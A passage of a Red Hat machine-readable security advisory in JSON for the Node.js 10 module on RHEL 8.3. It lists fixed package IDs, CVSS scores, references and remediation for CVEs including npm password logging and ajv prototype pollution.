"AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: HTTP request smuggling via two copies of a header field in an http request" }, { "cve": "CVE-2020-15095", "cwe": { "id": "CWE-532", "name": "Insertion of Sensitive Information into Log File" }, "discovery_date": "2020-07-14T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1856875" } ], "notes": [ { "category": "description", "text": "Versions of the npm CLI prior to 6.14.6 are vulnerable to an information exposure vulnerability through log files. The CLI supports URLs like \"\u003cprotocol\u003e://[\u003cuser\u003e[:\u003cpassword\u003e]@]\u003chostname\u003e[:\u003cport\u003e][:][/]\u003cpath\u003e\". The password value is not redacted and is printed to stdout and also to any generated log files.", "title": "Vulnerability description" }, { "category": "summary", "text": "npm: sensitive information exposure through logs", "title": "Vulnerability summary" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-15095" }, { "category": "external", "summary": "RHBZ#1856875", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1856875" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-15095", "url": "https://www.cve.org/CVERecord?id=CVE-2020-15095" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-15095", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15095" } ], "release_date": "2020-07-07T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-16T14:25:46+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0548" }, { "category": "workaround", "details": "Do not provide a password to npm via the cli to avoid it from being entered into the logs and stdout, or use ssh instead.", "product_ids": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "NONE", "baseScore": 4.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:N/A:N", "version": "3.1" }, "products": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-nodemon-0:1.18.3-1.module+el8+2632+6c5111ed.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-packaging-0:17-3.module+el8+2873+aa7dfd9a.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:npm-1:6.14.10-1.10.23.1.1.module+el8.3.0+9502+012d8a97.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "npm: sensitive information exposure through logs" }, { "cve": "CVE-2020-15366", "cwe": { "id": "CWE-471", "name": "Modification of Assumed-Immutable Data (MAID)" }, "discovery_date": "2020-07-15T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1857977" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ajv. A carefully crafted JSON schema could be provided that allows execution of other code by prototype pollution. While untrusted schemas are recommended against, the worst case of an untrusted schema should be a denial of service, not execution of code.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ajv: prototype pollution via crafted JSON schema in ajv.validate function", "title": "Vulnerability summary" }, { "category": "other", "text": "In both OpenShift Container Platform (OCP) and OpenShift ServiceMesh (OSSM), the affected containers are behind OpenShift OAuth authentication. This restricts access to the vulnerable nodejs-ajv library to authenticated users only, therefore the impact is low.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.src", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debuginfo-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-debugsource-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.ppc64le", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.s390x", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-devel-1:10.23.1-1.module+el8.3.0+9502+012d8a97.x86_64", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-docs-1:10.23.1-1.module+el8.3.0+9502+012d8a97.noarch", "AppStream-8.3.0.Z.MAIN:nodejs:10:8030020210118191659:229f0a1c:nodejs-full-i18n-1:10.23.1-1.module+el8.3.0+9502+012d8a97.aarch64", 